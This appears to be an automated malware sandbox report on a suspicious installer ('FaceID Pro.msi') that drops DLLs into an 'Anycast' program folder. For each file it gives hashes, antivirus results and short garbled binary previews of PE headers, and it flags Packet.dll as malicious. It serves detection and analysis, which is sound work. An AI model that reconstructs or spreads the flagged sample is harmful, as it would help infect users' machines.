                                                                                                                            • Filename: FaceID Pro.msi, Detection: malicious, Browse
                                                                                                                            • Filename: pRTafycKx1.exe, Detection: malicious, Browse
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....d..........." ..0..$...........C... ...`....... ....................................`.................................oC..O....`...................#..........|B..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................C......H.......4&.......................A........................................(....*..(....*.0....................(....}.....*6.|.....(...+*:.|......(...+*:.|......(...+*2.|....(....*..{....%-.&.|....s.....(....%-.&.{....*"..(....*>..}......}....*..0...........{....o........{....(....*Z..}......}......}....*N.{......{....s....*N.{.....{.....s....*v.{.....{....o ....{....s!...*..(....*"..s....*.0.....................s"...*&...s"...*..{#...*"..}#...*.0..F.........{$....Xh}$.....}%.

                                                                                                                            C:\Program Files (x86)\Anycast\Newtonsoft.Json.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):701992
                                                                                                                            Entropy (8bit):5.940787194132384
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:U9BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc3Q5:U8m657w6ZBLmkitKqBCjC0PDgM5A5
                                                                                                                            MD5:081D9558BBB7ADCE142DA153B2D5577A
                                                                                                                            SHA1:7D0AD03FBDA1C24F883116B940717E596073AE96
                                                                                                                            SHA-256:B624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3
                                                                                                                            SHA-512:2FDF035661F349206F58EA1FEED8805B7F9517A21F9C113E7301C69DE160F184C774350A12A710046E3FF6BAA37345D319B6F47FD24FBBA4E042D54014BEE511
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ..............................*^....`.....................................O.......................(..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........{...,..................d.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{^....3...{]......(....,...{]...*..{_.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                            C:\Program Files (x86)\Anycast\Packet.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):206352
                                                                                                                            Entropy (8bit):6.333738855773051
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:9vLYEEJS6OMZSMlNwf8dGUzgY6DU1zleTfUM8dvcImWbFTAA:90isZxlG+GU6KAUPF
                                                                                                                            MD5:5FC00659D63DC1F6D3EA47AD282FF3D2
                                                                                                                            SHA1:CF1C989875A1A98C3FF4AF0B469EE863636D1F06
                                                                                                                            SHA-256:3DEC61995D23D603224C67C41A1F49FE39D9C7C174A92A387BC5507A3CEBA863
                                                                                                                            SHA-512:8A00BDD0730A1922C9D29F4A202592C4088798DD767C927CE50B8625C71AFB0F3E350E0A6F8D880FB6900F2FF6C9AD8134D8E352CDDA97915BE4FF28C0778D33
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P....k}..k}..k}...y..k}...~..k}...x..k}.F.x.4k}.F.y..k}.F.~..k}...|..k}..k|.bk}...t..k}...}..k}......k}..k..k}......k}.Rich.k}.................PE..d......a.........." .................i.......................................`......z.....`..........................................................@..h.......`........"...P..........p..............................8...............h............................text...7........................... ..`.rdata..:...........................@..@.data.... ..........................@....pdata..`...........................@..@_RDATA.......0......................@..@.rsrc...h....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

                                                                                                                            C:\Program Files (x86)\Anycast\QRCoder.Xaml.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):19648
                                                                                                                            Entropy (8bit):6.8320151702374705
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:1rzAwQbQyVPPqz/F/u2KbXwcJCmTQF4PKOIuV7ym/4E6:1rzQ99Pqz9//DVUQF4TtyKy
                                                                                                                            MD5:253EC97668617D398355EE63D7B0792C
                                                                                                                            SHA1:668A116CCAA56926B928D326B13408135EF5A3E7
                                                                                                                            SHA-256:1D93F5D841C355CEB4BE32F3514F8517C2AA6B0010D88C6E6179D11D09367983
                                                                                                                            SHA-512:3F3B0CB64C6D7F5B039D8BE54ACDC816415EC432CF59DF01032CE060BFFED7A7D8C1BB9664D07FB214B0F85013FADE4E3EEF9DE36AFC9F2B550664947A3AFA22
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h9..........." ..0..............2... ...@....... ....................................@..................................2..O....@..4....................`.......1..T............................................ ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................2......H........#..@...................L1........................................(....*"..(....*&...(....*..0..4.........(.........Zl..Zl(......(....s....(....s.....(....*v..(....s....(....s.....(....*...0..B..........(.........Zl..Zl(.......(.........s.....(.........s......(....*...0.............(.......(......(....(.......l[...-..+...s........o......#........#........s......s....s....s....s....o....s .....#..........#.............+f#.............+C.(!...o".....o#.....o$...,...o%..

                                                                                                                            C:\Program Files (x86)\Anycast\QRCoder.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):156352
                                                                                                                            Entropy (8bit):6.00850557913152
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:k4wM6OoRu7qywKsqxhDuPr5xJMnOfMAw3TkHjt0QQNOWIkHUsz72otsVRVo:k4wZywKn/U5xEwKIk0WoVo
                                                                                                                            MD5:58F89736DC485D706547A3DA7FFF097A
                                                                                                                            SHA1:6F2403F02F1E632BA14CFB38842E685E43048DFB
                                                                                                                            SHA-256:C587C79BF64D622A8D45922EA2696FEFFDAFF7FB584CD5F1ECC6F6D96ABF8814
                                                                                                                            SHA-512:D19E62A1CA0FF162491C3E2F3063CC061E630932DF250D3F4F96F9C74F68605FE31A6CCFA9D72447827EBC2196CB01B8DB34744FCB694B8902962F69B429D5EF
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.b..........." ..0..*..........6&... ...`....... ...............................<....@..................................%..O....`...............4...............%..T............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................&......H............D...................$........................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. R..0 )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o ....%..{.......%q.........-.&.+.......o ....(!...*..{....*"..}....*..(....*:.(......(....*"..(....*f.(....%-.&+.(b.....(....*..(....*"..(....*...0..%.........("...(#...($....#.

                                                                                                                            C:\Program Files (x86)\Anycast\Sentry.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):498176
                                                                                                                            Entropy (8bit):6.6354935576021585
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:Wdkt/9+q0zmdhQ6TJLef8JDJw1+7qK7yIbE1vPNmZt7TAvO:WIBA+7bXTAG
                                                                                                                            MD5:7A2908EE1C3856B862AE5894F0566E42
                                                                                                                            SHA1:DCF1D1AC83A51BD43BD07E8D1E2C4B4BA101795C
                                                                                                                            SHA-256:DC1D0F3EAA6945E64AE324BAAC51F39483130A40A364CDA45A3E48998B13F5A3
                                                                                                                            SHA-512:BBB78BC75AD43A81CB69CA54AF7B513C0296AF4056D1771BFA9E087F0FD9E8EEE7794322C41B001ABB099A1061A45ECCE25BDA1E14B8B53F2486F2CDCC586E2E
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._d..........." ..0.............>.... ........... ..............................'.....`....................................O....................................d..p............................................ ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........1..(3..................4d........................................{J...*..{K...*..{L...*r.(M.....}J.....}K.....}L...*....0..Y........u=.......L.,G(N....{J....{J...oO...,/(P....{K....{K...oQ...,.(R....{L....{L...oS...*.*.*....0..K....... .F.. )UU.Z(N....{J...oT...X )UU.Z(P....{K...oU...X )UU.Z(R....{L...oV...X*..0...........r...p......%..{J......%qA....A...-.&.+...A...oW....%..{K......%qB....B...-.&.+...B...oW....%..{L......%qC....C...-.&.+...C...oW....(X...*..(Y...*..

                                                                                                                            C:\Program Files (x86)\Anycast\System.Buffers.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20856
                                                                                                                            Entropy (8bit):6.425485073687783
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:/rMdp9yXOfPfAxR5zwWvYW8a2cyHRN7vCvlbLg:/rMcXP6N6e
                                                                                                                            MD5:ECDFE8EDE869D2CCC6BF99981EA96400
                                                                                                                            SHA1:2F410A0396BC148ED533AD49B6415FB58DD4D641
                                                                                                                            SHA-256:ACCCCFBE45D9F08FFEED9916E37B33E98C65BE012CFFF6E7FA7B67210CE1FEFB
                                                                                                                            SHA-512:5FC7FEE5C25CB2EEE19737068968E00A00961C257271B420F594E5A0DA0559502D04EE6BA2D8D2AAD77F3769622F6743A5EE8DAE23F8F993F33FB09ED8DB2741
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ....................................@..................................B..O....`..@...............x#...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                            C:\Program Files (x86)\Anycast\System.Collections.Immutable.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):189312
                                                                                                                            Entropy (8bit):6.149301406867268
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:MHutEkGE0frJeOAY1tn/DuunP0F9QFg3QuxvkaHFckod:eu501WY9/DuOP0F9QFgwkm
                                                                                                                            MD5:C598080FA777D6E63DFD0370E97EC8F3
                                                                                                                            SHA1:9D1236DCFB3CAA07278A6D4EC751798D67D73CC2
                                                                                                                            SHA-256:646D3B52A4898078F46534727BDB06FF23B72523441458B9F49ECC315BF3EF5C
                                                                                                                            SHA-512:8A5B4AFB4363732008C97D53F13EE430401E4A17677AF37123DA035F15F9E9409A2AEB74AE238379291FD5DE07C3CD4E3DE2778DA5EDF83A42649FA5B281CB32
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|..........." ..0.............v.... ........... ....................... ...... f....`.................................!...O........................#..........0...T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................U.......H...........|...........p...@.............................................(....*..(....*^.(.......W...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..1.......(....,..%-.&.*..(.....o.......&...,...o....,..*.*....................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...

                                                                                                                            C:\Program Files (x86)\Anycast\System.Configuration.ConfigurationManager.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):86120
                                                                                                                            Entropy (8bit):5.289352470986192
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:J8KGCEPg1QqF3BhejEpvS/ZFQ+2/NVQ8GLa0Uh55T3lEC/IOPbZkxqN4bENZJlf6:GHCXBheNQ+2/NVQ8GLa0Uh55T3lEC/IJ
                                                                                                                            MD5:5DD78E2CA7BA1E18D9DF1ABC8A9416B2
                                                                                                                            SHA1:6A511A5688B188C4D1615CEDE33B1E5278376001
                                                                                                                            SHA-256:F393396CB12FB0977E50FBBFD5A0BA7E28B97FE93B68A91A6FCBBFBD24CEA8BC
                                                                                                                            SHA-512:2096C182860E7B71942EB1D89624E501DAA73ECCFC8974DC1C8A27167BED2CE4B8A393F467345570BCA7F58BA47FAA23EDB7B3E715CDA37AD268747E3EA5BA46
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.. ...........?... ...@....... ...............................s....`..................................>..O....@...............,..h$...`.......=..T............................................ ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......*..............@..B.................>......H....... ,..$...........D....}...=.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                            C:\Program Files (x86)\Anycast\System.Drawing.Common.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):53360
                                                                                                                            Entropy (8bit):5.738511598146454
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:4JbgUxvrIn01EkO/69KzwmOiGeCcSP8UIrdMe:41xvrInsEkO/AKzwm3C0UOdl
                                                                                                                            MD5:3C2445D3095F82EC8A526E7843A98BA9
                                                                                                                            SHA1:2F2C9D016FFC2BD7078104234E27AB2B010BD765
                                                                                                                            SHA-256:CA18383A2070518AE8C3E96CBD1705DA283C8ADA4DDF396217D2BCB7DCD03103
                                                                                                                            SHA-512:9CB5564EE52C1B71C732026D0BDB8414C09BA0037E12440F1D122644A977FB95FA4F9C13666053E4FCCE811E265F9B8AFE60FE1B007D9D2E278CF0D0A8C243FA
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............n.... ........... ...............................n....`.....................................O.......................p$..........8...T............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........)...\...............6...........................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                            C:\Program Files (x86)\Anycast\System.Memory.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):141184
                                                                                                                            Entropy (8bit):6.115495759785268
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:IUGrszKKLBFa9DvrJGeesIf3afNs2AldfI:jBFd3/aFs2
                                                                                                                            MD5:6FB95A357A3F7E88ADE5C1629E2801F8
                                                                                                                            SHA1:19BF79600B716523B5317B9A7B68760AE5D55741
                                                                                                                            SHA-256:8E76318E8B06692ABF7DAB1169D27D15557F7F0A34D36AF6463EFF0FE21213C7
                                                                                                                            SHA-512:293D8C709BC68D2C980A0DF423741CE06D05FF757077E63986D34CB6459F9623A024D12EF35A280F50D3D516D98ABE193213B9CA71BFDE2A9FE8753B1A6DE2F0
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`............@.................................X...O.... ..0................#...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                            C:\Program Files (x86)\Anycast\System.Net.Http.Formatting.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):179680
                                                                                                                            Entropy (8bit):6.155521882026328
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:MXWun8fS8fCk/Difbw37DVGbG8pwp2UuRLYs1+6fS:MXWu8fS4L/DS8rZGbGb5
                                                                                                                            MD5:4A7816CB1067972450045E4AFA50A0B8
                                                                                                                            SHA1:B92C69941C66D5526FF151E523EB92A8A90FC06A
                                                                                                                            SHA-256:00664130B963ACE5F1243AE4786926EA81BC181086FC7149D6123567C304D35B
                                                                                                                            SHA-512:5D26F6D696A4FDF2EAF204683ED18E8BAA75C88FB78EABBD478BBE4F91F46243A2BBF0EB0A6137DCED21C112662C8E431A8B4FE88DCF669D5CEDA0A860798C8A
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].b.........." ..0.................. ........... ...............................6....`.................................h...O........................'..........0................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......`...H............v...3..........................................R....s*... ....(....*F....s*.....(....*>.... ....(....*..0..d........(+....-.r...p(c...z.o,...-(r...p(...... ...%......(-...o.....(^...z.-.r...p(c...z.-.r...p(c...z.../.r1..p.............(g...z.o/...rG..p.o0...-'r...p(...... ...%..o/....%.rG..p.(^...z..o1...o2....>....rS..ps3......}.....o1...o4....+E.o5......s........s6.......o7....o8.....o7....o....o9......o:.....&...o$...-....,..o#.....(...+:.....o<...s

                                                                                                                            C:\Program Files (x86)\Anycast\System.Numerics.Vectors.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):115856
                                                                                                                            Entropy (8bit):5.631610124521223
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:nPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/hV+sUwS:nWw0SUUKBM8aOUiiGw7qa9tK/bJS
                                                                                                                            MD5:AAA2CBF14E06E9D3586D8A4ED455DB33
                                                                                                                            SHA1:3D216458740AD5CB05BC5F7C3491CDE44A1E5DF0
                                                                                                                            SHA-256:1D3EF8698281E7CF7371D1554AFEF5872B39F96C26DA772210A33DA041BA1183
                                                                                                                            SHA-512:0B14A039CA67982794A2BB69974EF04A7FBEE3686D7364F8F4DB70EA6259D29640CBB83D5B544D92FA1D3676C7619CD580FF45671A2BB4753ED8B383597C6DA8
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ..............................DF....@.................................f...O........................>.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                            C:\Program Files (x86)\Anycast\System.Reflection.Metadata.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):462728
                                                                                                                            Entropy (8bit):6.065574118553577
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:6GQpCbBfTdCUG6Af0AQu/uePT78Wz3g8V51G3tTkd72ipc5/cSAy/B:6GhBK0AQuueVLm9g7iky5
                                                                                                                            MD5:C4EA65BD802F1CCD3EA2AD1841FD85C2
                                                                                                                            SHA1:2364D6DD5DD3B566E06E6B1DC960533D2B3017B7
                                                                                                                            SHA-256:46451E1168DD11D450AA9B6119F17CEC9A70928A40AC3C752ABF61CE809CBA6F
                                                                                                                            SHA-512:FC4C18EA6A6F38D8C4B4F2E02D3D077CC729B531CA08CF9602C65E22AADC0BE770E441660CC980CBFED3B27BD783E65F793838532673E2845276390B4B22D730
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......K.....`.................................q...O.... ...................#...@..........T............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......,q...Y..........$....0............................................(N...*..(N...*^.(N......r...%...}....*:.(N.....}....*:.(N.....}....*:.(N.....}....*.~....*.0..1.......(....,..%-.&.*..(.....oO......&...,...oP...,..*.*....................(....,.r...p......%...%...(Q...*..(R...*.(....,.r...p......%...%...%...(Q...*...(S...*.(....,!r...p......%...%...%...%...(Q...*....(T...*..,&(....,..r...pr...p.(Q...(U...*..(V...*.*.(....,.r...p......%...%...(Q...*...(W...*.(....,.r...

                                                                                                                            C:\Program Files (x86)\Anycast\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):16768
                                                                                                                            Entropy (8bit):6.378509219645678
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:erLXx0hyLsbb3rxVj7WU2WLTYoW4GD5dHnhWgN7acWlbAkWD7DiqnajKs3WoHpZ:Ih06sbbVVPWU2WPY7dHRN77RGlGs3jJZ
                                                                                                                            MD5:9A341540899DCC5630886F2D921BE78F
                                                                                                                            SHA1:BAB44612721C3DC91AC3D9DFCA7C961A3A511508
                                                                                                                            SHA-256:3CADCB6B8A7335141C7C357A1D77AF1FF49B59B872DF494F5025580191D1C0D5
                                                                                                                            SHA-512:066984C83DE975DF03EEE1C2B5150C6B9B2E852D9CAF90CFD956E9F0F7BD5A956B96EA961B26F7CD14C089BC8A27F868B225167020C5EB6318F66E58113EFA37
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ..............................t@....@.................................@3..K....@...................#...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                            C:\Program Files (x86)\Anycast\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):33256
                                                                                                                            Entropy (8bit):6.470050941710262
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:vn1VM0JrpNWDcIh6leOiDFIFBYp1+ziBEBMf:vnvXYcIh6yFIFBYpczyEBMf
                                                                                                                            MD5:82DEB78891F430007E871A35CE28FAC4
                                                                                                                            SHA1:4E490D7EC139A6CDE53E3932D3122A48AA379904
                                                                                                                            SHA-256:2F141B72A2AF0458993E27559395D8A8CDB0B752D79B1703541A61E728B55237
                                                                                                                            SHA-512:E47F741AA9153CFAFC5F6BE39987D7C7D8FB745566C4D9A4525B9F30CBE6DF450D27BCDF8998DEC7AF824A7BE0F5E9EECAD2A39072B956A6320D23D94A0DA71A
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B...?..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                            C:\Program Files (x86)\Anycast\System.Security.AccessControl.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):35952
                                                                                                                            Entropy (8bit):5.895371991419636
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:zdlIF91FhktexyvaMAdB+w3G5h9MF4YfzMfpcrqmf9wEJqIxVRvFNgfBkyN17xWI:ZlM7Ke5/WBkyN1hhMPS
                                                                                                                            MD5:527595C86AD17045A101D567D7D3279F
                                                                                                                            SHA1:83014E2A98F7597B9A26E424A0759E5A3D2ECFF1
                                                                                                                            SHA-256:FF14C5F628B9A6798D173AEFBBA0A43D61E66F715108E2576AC0D3DFAB9071D0
                                                                                                                            SHA-512:9EBAACA1623BC8E2FC8DF158F338B5E415670FA53E212BB38771E7E25AF9688301CC4AEE055C5B64E33F8AA24729ED896E0BE8E2DBCE54386583C660476C5DDA
                                                                                                                            Malicious:false
